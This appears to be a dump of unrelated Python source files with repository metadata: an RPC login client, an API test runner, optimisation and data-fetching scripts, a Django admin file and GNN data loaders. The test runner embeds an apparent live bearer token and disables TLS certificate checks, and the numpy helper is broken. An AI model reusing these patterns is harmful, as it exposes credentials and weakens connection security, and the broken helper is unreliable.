log = pprint.PrettyPrinter(indent=4)
base_url = 'fix-online.sbis.ru'
session = requests.Session()
user_id = ""
def rpc(service, method, params):
global base_url
if "http:" in service or "https:" in service:
url = service
else:
url = "https://" + base_url + "/" + service + "/"
headers = {"Content-Type": "application/json; charset=utf-8", "Accept": "application/json"}
body = {"jsonrpc": "2.0", "protocol": 4, "method": method, "params": params}
sys.stdout.flush()
raw = session.post(url, headers=headers, json=body)
response = raw.json()
result = response.get("result")
if result is None:
print("\n-- {} on {} failed --".format(method, base_url))
log.pprint(response)
sys.stdout.flush()
raise response
return result
def rpc_return_record(service, method, params):
return parse_record(rpc(service, method, params))
def rpc_return_recordset(service, method, params):
return parse_recordset(rpc(service, method, params))
def login(url, user, password):
global base_url
base_url = url
rpc("auth/service", "САП.АутентифицироватьРасш", {"login": user, "password": password})
user_info = rpc_return_record("service", "Пользователь.GetCurrentUserInfo", {})
global user_id
user_id = str(user_info['ИдентификаторПользователя'])
# log.pprint(user_info)
# for c in session.cookies:
# log.pprint(f'{c.name}={c.value}')
def schema_type(s):
return {
'int': 'Число целое',
'int[]': {'n': "Массив", 't': "Число целое"},
'string': 'Строка',
'bool': 'Логическое',
'uuid': 'UUID',
'date-time': 'Дата и время',
'date': 'Дата',
'time': 'Время'
}[s]
def schema_field(s):
(n, t) = s.split(':')
return {'n': n, 't': schema_type(t)}
def schema(s):
return list(map(lambda f: schema_field(f), s.split(' ')))
def record(s, d):
return {'s': schema(s), 'd': d}
def recordset(s, d):
return {'s': schema(s), 'd': d}
def navigation(page, page_size, has_more):
return record('Страница:int РазмерСтраницы:int ЕстьЕще:bool', [page, page_size, has_more])
def field_type(t):
if type(t) is str:
return {
'Число целое': 'int',
'Текст': 'string',
'Строка': 'string',
'Логическое': 'bool',
'UUID': 'uuid',
'Дата и время': 'date-time',
'Дата': 'date',
'Время': 'time',
'Запись': 'record',
'Выборка': 'recordset',
'Идентификатор': 'int'
}[t]
if type(t) is dict and t['n'] == 'Массив':
return field_type(t['t']) + ' array'
return str(t)
def print_uni(record_or_recordset, indent):
s = record_or_recordset['s']
data = record_or_recordset['d']
_type = record_or_recordset['_type']
for field_index in sorted([[x, i] for i, x in enumerate(s)], key=lambda x: x[0]['n']):
field = field_index[0]
index = field_index[1]
type_name = field_type(field['t'])
print(indent + field['n'] + ' ' + type_name)
if type_name == 'record' or type_name == 'recordset':
if _type == 'record':
sample = data[index]
if sample:
print_uni(sample, indent + '\t')
else:
for r in data:
sample = r[index]
if sample:
print_uni(sample, indent + '\t')
break
def parse_schema(record_or_recordset):
names = []
for s in record_or_recordset['s']:
names.append(s['n'])
return names
def parse_data(names, d):
item = {}
i = 0
for n in names:
v = d[i]
if isinstance(v, dict):
if v['_type'] == 'record':
v = parse_record(v)
elif v['_type'] == 'recordset':
v = parse_recordset(v)
item[n] = v
i += 1
return item
def parse_recordset(rs):
names = parse_schema(rs)
items = []
for d in rs['d']:
items.append(parse_data(names, d))
return items
def parse_record(r):
return parse_data(parse_schema(r), r['d'])
def parse_record_or_recordset(r):
if r['_type'] == 'record':
return parse_record(r)
else:
return parse_recordset(r)
|
[
"ameliya9@mail.ru"
] |
ameliya9@mail.ru
|
18cee653080385d873c821f33b86e5137a1d2c2e
|
3a2b9a75c47cae05d974ec06d75f621decfeefdd
|
/base/runmethod.py
|
14caac28bd5f44cf1d997e0a39c1b9ff3776a482
|
[] |
no_license
|
fan1992619/at_api
|
d72fc3344eeb7a15f950387a6009e4c7273e6059
|
6e61eb336523d1d59609a4d147744508c3f48729
|
refs/heads/master
| 2021-07-07T19:14:29.125202
| 2020-06-07T13:38:09
| 2020-06-07T13:38:09
| 152,037,744
| 0
| 1
| null | 2020-07-21T09:40:43
| 2018-10-08T07:37:59
|
Python
|
UTF-8
|
Python
| false
| false
| 3,318
|
py
|
# coding:utf-8
import requests
import json
import time
#解决ssl证书报错导入以下包
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# verify=False 忽略https产生的ssl报错
import random
class RunMethod:
# 定义一个post方法
def post_main(self,url,header=None,data=None):
res = None
if header !=None:
try:
res = requests.post(url=url,data=data,headers=header,verify=False).json()
if res['code']==-204:
#发布文章已达到上线或者重复提交
print ("重复提交,false")
res=self.delete_main(url,header,data)
elif res['code']==-201:
#已经点赞过该文章
time.sleep(3)
res=self.delete_main(url,header,data)
res=requests.post(url=url,data=data,headers=header,verify=False).json()
elif res['code']==-2:
#你无权修改他人信息,标记信息已读或者数据格式错误
pass
except:
res = requests.post(url=url, data=data, headers=header, verify=False)
res=res.status_code
else:
res = requests.post(url=url,data=data,verify=False).json()
time.sleep(2)
return json.dumps(res)
#定义一个get方法
def get_main(self,url,header=None,data=None):
res = None
if header !=None:
try:
res = requests.get(url=url, data=data, headers=header, verify=False).json()
except:
res=requests.get(url=url, data=data, headers=header, verify=False)
res=res.status_code
else:
try:
res = requests.get(url=url, data=data, verify=False).json()
# if res['accessid']:
# #处理oss签名接口
# time.sleep(3)
# res=requests.get(url=url, data=data, verify=False)
# res=res.status_code
# elif res['code']:
# pass
except:
res = requests.get(url=url, data=data, verify=False)
res = res.status_code
return json.dumps(res)
#定义一个delete方法
def delete_main(self,url,header=None,data=None):
res=None
res=requests.delete(url=url,data=data,headers=header,verify=False).json()
if res['code']!=0:
res=self.post_main(url,data,header)
res=requests.delete(url=url,data=data,headers=header,verify=False).json()
return json.dumps(res)
def run_main(self,method,url,header=None,data=None):
res = None
if method == 'post':
res = self.post_main(url,header,data)
elif method=='delete':
res=self.delete_main(url,header,data)
else:
res = self.get_main(url,header,data)
# return json.dumps(res,ensure_ascii=False)
return res
if __name__ == '__main__':
run=RunMethod()
header={
'Host': 'api.at.top',
'Connection': 'Keep-Alive',
'Accept-Encoding': 'gzip',
'User-Agent': 'okhttp/3.8.1',
'Authorization': 'Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczpcL1wvYXBpLmF0LnRvcFwvdjFcL2FjY291bnRcL3NpZ25pbiIsImlhdCI6MTU0MjcxMDM2MywiZXhwIjoxNTc0MjQ2MzYzLCJuYmYiOjE1NDI3MTAzNjMsImp0aSI6Ijk4ZUtCb2gzaEV1SUE1ckgiLCJzdWIiOiIzMSIsInBydiI6ImM4ZWUxZmM4OWU3NzVlYzRjNzM4NjY3ZTViZTE3YTU5MGI2ZDQwZmMifQ.Ey2Ot4nRgH_fV8Q7D42aKoXH2NzzPYja6bedpBqaXI4',
'deviceid': 'ac:c1:ee:c0:33:34-ac:c1:ee:c0:33:34',
'getuiclientid': '5b9a0d6f110d2b136f9ca135d93fad06',
'platform': 'android',
'userid': '33',
'version': '2.1.0'
}
data={}
url='https://api.at.top/v1/public/parameters'
print(run.run_main('get',url))
|
[
"fan1992619@163.com"
] |
fan1992619@163.com
|
b084b8900fb016f4b9475e88b75aad0b9b39e8ab
|
1be46b1c0570bfbafdabfc362f9f8be8a98e2640
|
/POO/ToDo_v3.py
|
bcd9b8451b23d98ffec6c9be5c39fd3cccea6678
|
[] |
no_license
|
beaapaixao/praticas_em_python
|
8c9387cbb6b97fb52577d101e03181545190a568
|
ca82cb12bf048dd7a501beeb09c6efd0ffc67567
|
refs/heads/master
| 2022-11-04T07:18:12.779415
| 2020-06-18T22:33:32
| 2020-06-18T22:33:32
| 257,736,346
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,611
|
py
|
from datetime import datetime
class Projeto:
def __init__(self, nome):
self.nome = nome
self.tarefas = []
def __iter__(self):
return self.tarefas.__iter__()
def add(self, descricao):
self.tarefas.append(Tarefa(descricao))
def pendentes(self):
return [tarefa for tarefa in self.tarefas if not tarefa.feito]
def procurar(self, descricao):
# possivel Inde
return [tarefa for tarefa in self.tarefas
if tarefa.descricao == descricao][0]
def __str__(self):
return f'{self.nome} ({len(self.pendentes())} tarefa(s) pendente(s))'
class Tarefa:
def __init__(self, descricao):
self.descricao = descricao
self.feito = False
self.criacao = datetime.now()
def concluir(self):
self.feito = True
def __str__(self):
return self.descricao + ((' Concluído') if self.feito else "")
def main():
casa = Projeto('Tarefas de casa')
casa.add('Passar roupa')
casa.add('Lavar roupa')
print(casa)
casa.procurar('Lavar roupa').concluir()
# agora só tarefa in casa, porque tem o __iter__
for tarefa in casa:
print(f'-{tarefa}')
print(casa)
mercado = Projeto('Compras no mercado')
mercado.add('Frutas')
mercado.add('Carne')
mercado.add('Tomate')
print(mercado)
comprar_carne = mercado.procurar('Carne')
comprar_carne.concluir()
# agora só tarefa in mercado, porque tem o __iter__
for tarefa in mercado:
print(f'-{tarefa}')
print(mercado)
if __name__ == '__main__':
main()
|
[
"brendacefet@gmail.com"
] |
brendacefet@gmail.com
|
ccd69ec56c7da165b6fa0449b4e44b9a44fd4bcd
|
f8ded08c57af4a3726a791b094b38970cbb921e9
|
/examples/lattice_example06.py
|
34a47cddce14dd764f333c1d5385f93406f71716
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
mrakitin/mystic
|
ebeb837b8535ebb2a323519b900cb69e1bbb8a2d
|
6c269510fd9068d157554eaef99bc1a546b54a59
|
refs/heads/master
| 2020-12-30T16:39:55.072424
| 2017-05-10T18:40:44
| 2017-05-10T18:40:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,124
|
py
|
#!/usr/bin/env python
#
# Author: Mike McKerns (mmckerns @caltech and @uqfoundation)
# Copyright (c) 1997-2016 California Institute of Technology.
# Copyright (c) 2016-2017 The Uncertainty Quantification Foundation.
# License: 3-clause BSD. The full license text is available at:
# - http://trac.mystic.cacr.caltech.edu/project/mystic/browser/mystic/LICENSE
"""
Example:
- Solve 8th-order Chebyshev polynomial coefficients with Powell's method.
- Uses LatticeSolver to provide 'pseudo-global' optimization
- Plot of fitting to Chebyshev polynomial.
Demonstrates:
- standard models
- minimal solver interface
"""
# the Lattice solver
from mystic.solvers import LatticeSolver
# Powell's Directonal solver
from mystic.solvers import PowellDirectionalSolver
# Chebyshev polynomial and cost function
from mystic.models.poly import chebyshev8, chebyshev8cost
from mystic.models.poly import chebyshev8coeffs
# if available, use a pathos worker pool
try:
from pathos.pools import ProcessPool as Pool
#from pathos.pools import ParallelPool as Pool
except ImportError:
from mystic.pools import SerialPool as Pool
# tools
from mystic.termination import NormalizedChangeOverGeneration as NCOG
from mystic.math import poly1d
from mystic.monitors import VerboseMonitor
from mystic.tools import getch
import pylab
pylab.ion()
# draw the plot
def plot_exact():
pylab.title("fitting 8th-order Chebyshev polynomial coefficients")
pylab.xlabel("x")
pylab.ylabel("f(x)")
import numpy
x = numpy.arange(-1.2, 1.2001, 0.01)
exact = chebyshev8(x)
pylab.plot(x,exact,'b-')
pylab.legend(["Exact"])
pylab.axis([-1.4,1.4,-2,8],'k-')
pylab.draw()
return
# plot the polynomial
def plot_solution(params,style='y-'):
import numpy
x = numpy.arange(-1.2, 1.2001, 0.01)
f = poly1d(params)
y = f(x)
pylab.plot(x,y,style)
pylab.legend(["Exact","Fitted"])
pylab.axis([-1.4,1.4,-2,8],'k-')
pylab.draw()
return
if __name__ == '__main__':
from pathos.helpers import freeze_support
freeze_support() # help Windows use multiprocessing
print "Powell's Method"
print "==============="
# dimensional information
from mystic.tools import random_seed
random_seed(123)
ndim = 9
nbins = 8 #[2,1,2,1,2,1,2,1,1]
# draw frame and exact coefficients
plot_exact()
# configure monitor
stepmon = VerboseMonitor(1)
# use lattice-Powell to solve 8th-order Chebyshev coefficients
solver = LatticeSolver(ndim, nbins)
solver.SetNestedSolver(PowellDirectionalSolver)
solver.SetMapper(Pool().map)
solver.SetGenerationMonitor(stepmon)
solver.SetStrictRanges(min=[-300]*ndim, max=[300]*ndim)
solver.Solve(chebyshev8cost, NCOG(1e-4), disp=1)
solution = solver.Solution()
# use pretty print for polynomials
print poly1d(solution)
# compare solution with actual 8th-order Chebyshev coefficients
print "\nActual Coefficients:\n %s\n" % poly1d(chebyshev8coeffs)
# plot solution versus exact coefficients
plot_solution(solution)
getch()
# end of file
|
[
"mmckerns@968178ea-60bd-409e-af13-df8a517b6005"
] |
mmckerns@968178ea-60bd-409e-af13-df8a517b6005
|
f7aaea171c226e956f45fd71047404ac7c38ce8d
|
39af46b443873ed96809a46a6e15a221955cf0c7
|
/args.py
|
4bf00ee1e2377ade44158d39b2a2071ca22ef6bb
|
[] |
no_license
|
clementbeaulieu/DeepSets
|
61c786243d3527a90dc473984cd28464a4baf1ed
|
b26c97aad5b03267a61fb9ad2734f1ac407393f1
|
refs/heads/master
| 2022-11-11T17:06:00.831367
| 2020-07-06T20:23:16
| 2020-07-06T20:23:16
| 268,858,766
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,957
|
py
|
import sys
import argparse
import torch
def parse_args():
parser = argparse.ArgumentParser(description='')
# expriment settings
# name of the experiment
parser.add_argument('--name', default='digitsum', type=str, help='name of experiment')
parser.add_argument('--train-type', default='regression', type=str, help='type of learning task (regression, classification or unsupervised)')
parser.add_argument('--val-type', default='regression', type=str, help='type of validation task (regression, classification, unsupervised or customed)')
parser.add_argument('--test-type', default='regression', type=str, help='type of test task (regression, classification, unsupervised or customed)')
parser.add_argument('--print-freq-train', type=int, default=10, help='print freq of batch values on training')
parser.add_argument('--print-freq-val', type=int, default=10, help='print freq of batch values on training')
# name of the dataset used in the experiment
parser.add_argument('--dataset', default='digitsum_image', type=str, help='name of dataset to train upon')
parser.add_argument('--test', dest='test', action='store_true', default=False, help='To run inference on test set.')
# main folder for data storage
parser.add_argument('--root-dir', type=str, default=None)
# model settings
parser.add_argument('--arch', type=str, default='digitsum_image', help='name of the architecture to be used')
parser.add_argument('--model-name', type=str, default='digitsum_image50', help='name of the model to be used')
parser.add_argument('--resume', default='', type=str, metavar='PATH',
help='which checkpoint to resume from. possible values["latest", "best", epoch]')
# params for digitsum image experiment
parser.add_argument('--min-size-train', type=int, default = 2, help='min size for train set sizes')
parser.add_argument('--max-size-train', type=int, default = 10, help='max size for train set sizes')
parser.add_argument('--min-size-val', type=int, default = 5, help='min size validation/test for set sizes')
parser.add_argument('--max-size-val', type=int, default = 50, help='max size validation/test for set sizes')
parser.add_argument('--dataset-size-train', type=int, default = 100000, help='size of the train dataset of sets')
parser.add_argument('--dataset-size-val', type=int, default = 10000, help='size of the validation/test dataset of sets')
parser.add_argument('--set-weight', type=str, default='mean', help='default set_weight metrics for set_MAP score (mean, linear or exp)')
# params for classification tasks
parser.add_argument('--num-classes', default=0, type=int)
# number of workers for the dataloader
parser.add_argument('-j', '--workers', type=int, default=4)
# training settings
parser.add_argument('--start-epoch', type=int, default=1)
parser.add_argument('--step', type=int, default=20, help='frequency of updating learning rate')
parser.add_argument('--batch-size', type=int, default=64, metavar='N', help='input batch size for training (default: 64)')
parser.add_argument('--epochs', type=int, default=100, metavar='N', help='number of epochs to train (default: 70)')
parser.add_argument('--optimizer', default='adam', type=str, help='name of the optimizer')
parser.add_argument('--scheduler', default='StepLR', type=str, help='name of the learning rate scheduler')
parser.add_argument('--lr', type=float, default=0.01, metavar='LR', help='learning rate (default: 0.01)')
parser.add_argument('--momentum', type=float, default=0.9, metavar='M', help='sgd momentum (default: 0.9)')
parser.add_argument('--weight-decay', '--wd', default=1e-4, type=float, metavar='W', help='weight decay (default: 1e-4)')
parser.add_argument('--lr-decay', default=0.995, type=float, metavar='lrd', help='learning rate decay (default: 0.995)')
parser.add_argument('--criterion', default='mse', type=str, help='criterion to optimize')
# misc settings
parser.add_argument('--seed', type=int, default=42, metavar='S', help='random seed (default: 42)')
parser.add_argument('--disable-cuda', action='store_true', default=False, help='disables CUDA training / using only CPU')
parser.add_argument('--tensorboard', dest='tensorboard', action='store_true',default=False, help='Use tensorboard to track and plot')
args = parser.parse_args()
# update args
args.data_dir = '{}/{}'.format(args.root_dir, args.dataset)
args.log_dir = '{}/runs/{}/'.format(args.data_dir, args.name)
#args.res_dir = '%s/runs/%s/res' % (args.data_dir, args.name)
args.out_pred_dir = '%s/runs/%s/pred' % (args.data_dir, args.name)
args.cuda = not args.disable_cuda and torch.cuda.is_available()
args.device = 'cuda' if args.cuda else 'cpu'
assert args.data_dir is not None
print(' '.join(sys.argv))
print(args)
return args
|
[
"clement.beaulieu@polytechnique.edu"
] |
clement.beaulieu@polytechnique.edu
|
bb8be5e76279953821643710c6b9aef108f9a32e
|
04935a87faa632ad8b588d3e8c8e84f1e1359349
|
/backend/l11n/admin.py
|
7ccc3c868ed44c825efa968ae34baaae94b79b6c
|
[
"BSD-3-Clause"
] |
permissive
|
tughi/localizappion
|
9d80473e838c551148e03c3b030f24bb8030e805
|
5c963dc8f7262cdb411cfbcc29ab4fac8fffc6c8
|
refs/heads/master
| 2021-01-18T20:32:30.364400
| 2018-06-06T21:39:00
| 2018-06-06T21:39:00
| 86,977,623
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 446
|
py
|
from django.contrib import admin
from .models import Project
from .models import Session
from .models import String
from .models import Suggestion
from .models import Translation
from .models import Translator
from .models import Vote
admin.site.register(Project)
admin.site.register(Session)
admin.site.register(String)
admin.site.register(Suggestion)
admin.site.register(Translation)
admin.site.register(Translator)
admin.site.register(Vote)
|
[
"admin@tughi.com"
] |
admin@tughi.com
|
844148e71e068c7822a323420d0c8c3b7e3f55a6
|
72c34626845057e150fb2f808813ba2d440aafb4
|
/Market_place/main/urls.py
|
f9840a82512132e4fad059d28745b78f1e9293bc
|
[] |
no_license
|
IgorSulj/Market_place
|
b15a82db28b937b966cf149ebe100540e2f9b0c2
|
2eb0a864e6d8e18a57974cc717661f7711d32607
|
refs/heads/master
| 2023-03-05T22:13:24.563308
| 2021-02-21T18:36:54
| 2021-02-21T18:36:54
| 340,967,480
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 148
|
py
|
from django.urls import path, include
from .views import start_page
app_name ='main'
urlpatterns = [
path('',start_page, name='start_page'),
]
|
[
"igorsuljin@gmail.com"
] |
igorsuljin@gmail.com
|
c404f0baaf3f4d8216168f863d039b1e9416ecd8
|
2b9765b1af64e52e16e1a4743595acb60276cd1a
|
/3_experiment/3_3_data_analysis_md/Python/jupyter/utils_exG.py
|
2e08803ab9ebdf98525cb3a56b07fe3d59b1b134
|
[] |
no_license
|
danieljwilson/MADE
|
af82814d2bdde6671279c781cefccec3ee119f96
|
9337ad740205cc9c8a2e73f7ad45bf9cc96e5193
|
refs/heads/master
| 2021-07-13T03:27:28.612081
| 2020-07-10T12:44:33
| 2020-07-10T12:44:33
| 170,940,265
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,002
|
py
|
#!/usr/bin/python
"""
util.py
Author: Daniel J Wilson, daniel.j.wilson@gmail.com
Date: April 20, 2018
Utility functions for creating fixation distributions using ExGUtils.
Note: Runs on Python 2
https://pypi.org/project/ExGUtils/
"""
import numpy as np
import pandas as pd
import os
import pickle # for saving to pickle
import glob
# ExGUtils Imports
from ExGUtils.pyexg import stats, drand, exp_rvs, gauss_rvs, exg_rvs
from ExGUtils.pyexg import *
def create_subject_dwell_samples(number, fixations_file, output_filepath):
"""
Function Description
"""
#-------------------------#
# Import fixation data #
#-------------------------#
fixations = pd.read_csv(fixations_file)
#-------------------------#
# Clean data #
#-------------------------#
# Cleaned fixations of less than 100ms
fixations_cleaned = fixations[fixations.fix_time > 100]
# Indicate percentage of removed fixations
removed = ((float(len(fixations)) - float(len(fixations_cleaned)))/float(len(fixations))) * 100
print('Cleaning fixation values below 100 ms removed {0}% of all fixations.\n'.format(round(removed, 2)))
#------------------------------#
# Create First/Mid Fix Dists. #
# for Group and Indiv. #
#------------------------------#
# GROUP
group_first_fix = fixations['fix_time'][fixations['fix_num']==1]
group_mid_fix = fixations['fix_time'][(fixations['fix_num']>1) & (fixations['rev_fix_num']>1)]
# INDIVIDUAL
subj_first_fix = {}
subj_mid_fix = {}
for i in np.unique(fixations.parcode):
subj_first_fix[i] = fixations['fix_time'][(fixations['fix_num']==1) & (fixations['parcode']==i)]
subj_mid_fix[i] = fixations['fix_time'][(fixations['fix_num']>1) & (fixations['rev_fix_num']>1) & (fixations['parcode']==i)]
#------------------------------#
# Create fixation dists. #
# based on indiv. params. #
#------------------------------#
N = number
subj_first_fix_synth = {}
subj_mid_fix_synth = {}
print('Creating subject fixation distributions...')
for i in np.unique(fixations.parcode):
x_first = subj_first_fix[i].values.tolist()
x_mid = subj_mid_fix[i].values.tolist()
[mlk_f, slk_f, tlk_f] =maxLKHD(x_first)
[mlk_m, slk_m, tlk_m] =maxLKHD(x_mid)
subj_first_fix_synth[i] = [exg_rvs(mlk_f, slk_f, tlk_f) for ii in xrange(N)]
subj_mid_fix_synth[i] = [exg_rvs(mlk_m, slk_m , tlk_m) for ii in xrange(N)]
print('{0}...'.format(i))
#------------------------------#
# Save distributions file #
#------------------------------#
if not os.path.exists(output_filepath): # create the directory if it does not already exist
os.makedirs(output_filepath)
pickle_out = open(output_filepath + "subj_first_fix_synth.pickle","wb")
pickle.dump(subj_first_fix_synth, pickle_out)
pickle_out.close()
pickle_out = open(output_filepath + "subj_mid_fix_synth.pickle","wb")
pickle.dump(subj_mid_fix_synth, pickle_out)
pickle_out.close()
|
[
"daniel.j.wilson@gmail.com"
] |
daniel.j.wilson@gmail.com
|
ef4629047e768046dd194987c4ad80535fe3c764
|
c4fad14fa55d67d26e3a5d08a8eca8d54b49bd10
|
/Project_Analytic_Code/311_data/get311dataclean.py
|
ff0148561218e2accaec08a5058c42d6ef02413b
|
[] |
no_license
|
sds695/Graffiti_nyc
|
1d98f66dbd5e75255064fcc064348b7f023067c6
|
94c4aaaec01c302e7653c16283df63b8515fb7b9
|
refs/heads/master
| 2020-07-01T06:33:58.825534
| 2019-08-07T20:47:24
| 2019-08-07T20:47:24
| 201,076,492
| 0
| 2
| null | 2019-08-07T20:29:34
| 2019-08-07T15:23:10
| null |
UTF-8
|
Python
| false
| false
| 1,348
|
py
|
#!/usr/bin/env python3 -V
## python xxx.py 1000000 2019-03-01 2019-04-01 Mar2019.csv Mar2019_clean.csv
# not using Sodapy
# try to output print the total row
import csv
import sys
import json
import requests
import pandas as pd
inputLimit = sys.argv[1]
from_ = sys.argv[2]
to_ = sys.argv[3]
file = sys.argv[4]
outputfile = sys.argv[5]
url ="https://data.cityofnewyork.us/resource/fhrw-4uyv.json"
query = "?$where=created_date BETWEEN '"+from_+"' AND '"+to_+"'"+"&$limit="+str(inputLimit)
link = url+query
jsonData = requests.get(link)
results = json.loads(jsonData.text)
keys=set()
n = 0
for d in results:
n+=1
keys.update(d.keys())
print(n)
with open(file,'w',encoding='utf-8') as fi:
output=csv.DictWriter(fi,fieldnames=keys)
output.writeheader()
output.writerows(results)
data_311 = pd.read_csv(file,usecols=['complaint_type','unique_key','latitude','longitude','created_date'])
# df.joined = pd.to_datetime(df.joined, format='%m/%d/%y')
data_311_graffiti = data_311[data_311.complaint_type=='Graffiti']
print(data_311.shape,data_311_graffiti.shape)
data_311_graffiti.drop('complaint_type',axis=1,inplace=True)
data_311_graffiti.dropna(inplace=True)
data_311_graffiti['created_date'] = pd.to_datetime(data_311_graffiti.created_date, format='%Y-%m-%d')
data_311_graffiti.to_csv(outputfile,index=False)
|
[
"noreply@github.com"
] |
sds695.noreply@github.com
|
87ed409979ce273e82d0a5d78486e6781252f9a0
|
fdfe8cb6d56775070a3269132e04dac66703686f
|
/math/0x00-linear_algebra/102-squashed_like_sardines.py
|
4a1549d46261e632ecf8884c64693797b0331dd2
|
[] |
no_license
|
ABERKOUKS/mundiapolis-math
|
6869156af6dc0c6cbbb4f18ad7a5dc0d66aa3109
|
7c3f657ed43e768c88f1e27bf33af09037393403
|
refs/heads/main
| 2023-03-22T03:03:50.981649
| 2021-03-19T22:47:26
| 2021-03-19T22:47:26
| 346,022,472
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 276
|
py
|
#!/usr/bin/env python3
def cat_matrices(mat1, mat2, axis=0):
try:
return np.concatenate((mat1, mat2), axis).tolist()
return np.concatenate(
(mat1, mat2), axis, out=None
).tolist()
except ValueError:
return None
|
[
"noreply@github.com"
] |
ABERKOUKS.noreply@github.com
|
6f39170e141c34c4ed7e0728026abedadb161926
|
76c0f49248f9cde2dd6126cea74dc7ab6ca02e4d
|
/GNN/utils.py
|
1d9a5d1275d598d181193e1d6d305f1cf903428d
|
[] |
no_license
|
LXD789/Du-FAGNN
|
526ff6de9b3b0e454eca92d0ea108db56a7c2274
|
a334bbc249a15c34280e6f8137e21a1455166bad
|
refs/heads/main
| 2023-07-09T19:54:49.301044
| 2021-08-17T11:35:59
| 2021-08-17T11:35:59
| 369,227,525
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 22,039
|
py
|
import numpy as np
import pickle as pkl
import scipy.sparse as sp
from scipy.sparse.linalg.eigen.arpack import eigsh
import sys
import random
import re
from tqdm import tqdm
import jieba
# import sparse
def parse_index_file(filename):
"""Parse index file.解析索引文件"""
index = [] # 定义列表index
for line in open(filename): # 对于打开的文件filename中的每一行(每一次循环),
# 在index中添加这一行去掉字符串头尾字符后的新字符串。
index.append(int(line.strip()))
# strip()方法用于移除字符串头尾指定的字符(默认为空格或换行符)或字符序列。返回移除字符串头尾指定的字符生成的新字符串。
# 该方法只能删除开头或是结尾的字符,不能删除中间部分的字符。
return index # 返回index,即返回文件中在每一行去掉字符串头尾后的内容
def sample_mask(idx, l):
"""Create mask.生成掩码"""
mask = np.zeros(l) # 定义n维数组类型(ndarray)对象mask,赋值为有l(英文字母l)个元素的用0填充的数组
mask[idx] = 1 # 将mask中下标为idx的元素置为1(数字1)
return np.array(mask, dtype=np.bool) # 返回数组mask,并将其元素转换为bool型(0转换为false,1转换为true)
def load_data(dataset_str):
"""
Loads input data from gcn/data directory从文件中加载并解析、提取(分离)输入数据
ind.dataset_str.x => the feature vectors and adjacency matrix of the training instances as list;
训练实例的特征向量和邻接矩阵,为列表
ind.dataset_str.tx => the feature vectors and adjacency matrix of the test instances as list;
测试实例的特征向量和邻接矩阵,为列表
ind.dataset_str.allx => the feature vectors and adjacency matrix of both labeled and unlabeled training instances
(a superset of ind.dataset_str.x) as list;
标记和未标记训练实例的特征向量和邻接矩阵(ind.dataset_str.x的超集),为列表
ind.dataset_str.y => the one-hot labels of the labeled training instances as numpy.ndarray object;
带标签的训练实例的独热标签,为numpy.ndarray对象
ind.dataset_str.ty => the one-hot labels of the test instances as numpy.ndarray object;
测试实例的独热标签,为numpy.ndarray对象
ind.dataset_str.ally => the labels for instances in ind.dataset_str.allx as numpy.ndarray object;
ind.dataset_str.allx中实例的标签,为numpy.ndarray对象
All objects above must be saved using python pickle module.以上所有的对象必须使用python pickle module保存。
python pickle module:python的序列化文件保存形式
:param dataset_str: Dataset name数据集名
:return: All data input files loaded (as well the training/test data).加载的所有数据输入文件(以及训练/测试数据)。
"""
names = ['x_adj', 'x_embed', 'y', 'tx_adj', 'tx_embed', 'ty', 'allx_adj', 'allx_embed', 'ally']
# 列表类对象names存储各类文件名
objects = [] # 定义列表类对象object
# 1.解析文件(将序列化的文件内容进行反序列化)
for i in range(len(names)): # 对于每次循环里names中的每一个元素:
with open("data/ind.{}.{}".format(dataset_str, names[i]), 'rb') as f:
# 此句意为打开相应文件,并将其标记为f
# “data/ind.{}.{}”文件中的{}{}用dataset_str和当前names中的元素来表示
# format():格式化字符串的函数str.format(),它增强了字符串格式化的功能。基本语法是通过{}和:来代替以前的%。
if sys.version_info > (3, 0):
# 此句:若python版本大于3.0,则在列表objects中添加元素(新添元素为当前打开并已做前边处理后的文件),
# 编码方式为latin1
# sys.version_info:获取python版本号(此程序使用的是3.6)
objects.append(pkl.load(f, encoding='latin1'))
# pkl.load():反序列化对象,将文件中的数据解析为一个python对象。
else: # 否则在objects中添加元素(当前打开并已做前边处理后的文件),编码方式为函数默认方式
objects.append(pkl.load(f))
x_adj, x_embed, y, tx_adj, tx_embed, ty, allx_adj, allx_embed, ally = tuple(objects)
# 将objects(列表类对象)转换为元组类对象,并赋值给以上9个变量(即objects中对应的9个部分分别赋给这9个变量)
# train_idx_ori = parse_index_file("data/{}.train.index".format(dataset_str))
# train_size = len(train_idx_ori)
train_adj = [] # 训练集的邻接矩阵
train_embed = [] # 训练集的特征向量
val_adj = [] # 验证集的邻接矩阵
val_embed = [] # 验证集的特征向量
test_adj = [] # 测试集的邻接矩阵
test_embed = [] # 测试集的特征向量
# 定义6个列表类对象
# 2.分别将训练集、测试集和验证集的邻接矩阵和特征向量提取出来单独存放为列表,并将他们转换为数组。
# 下面这个for循环是将训练集的邻接矩阵和特征向量分别提取出来(为什么多此一举?答:元组不可更改,所以要转换为数组)
for i in range(len(y)): # 对于循环里文件y(带标签的训练实例的独热标签,为numpy.ndarray对象)中的每一个元素:
adj = x_adj[i].toarray() # 定义adj,赋值为转换成数组类型的x_adj的当前元素
embed = np.array(x_embed[i]) # 定义embed,赋值为转换成数组类型的x_embed的当前元素
train_adj.append(adj) # 在train_adj中添加adj(即x_adj当前元素)
train_embed.append(embed) # 在train_embed中添加embed(即x_embed当前元素)
# 下面这个for循环是将训练集的超集的邻接矩阵和特征向量分别提取出来,放入各自的列表中
for i in range(len(y), len(ally)): # train_size):
adj = allx_adj[i].toarray()
embed = np.array(allx_embed[i])
val_adj.append(adj)
val_embed.append(embed)
# 下面这个for循环是将测试集的特征向量和邻接矩阵分别提取出来,放入各自的列表中
for i in range(len(ty)):
adj = tx_adj[i].toarray()
embed = np.array(tx_embed[i])
test_adj.append(adj)
test_embed.append(embed)
# 将列表转换为数组(这里不明白为什么要将列表转换为数组)
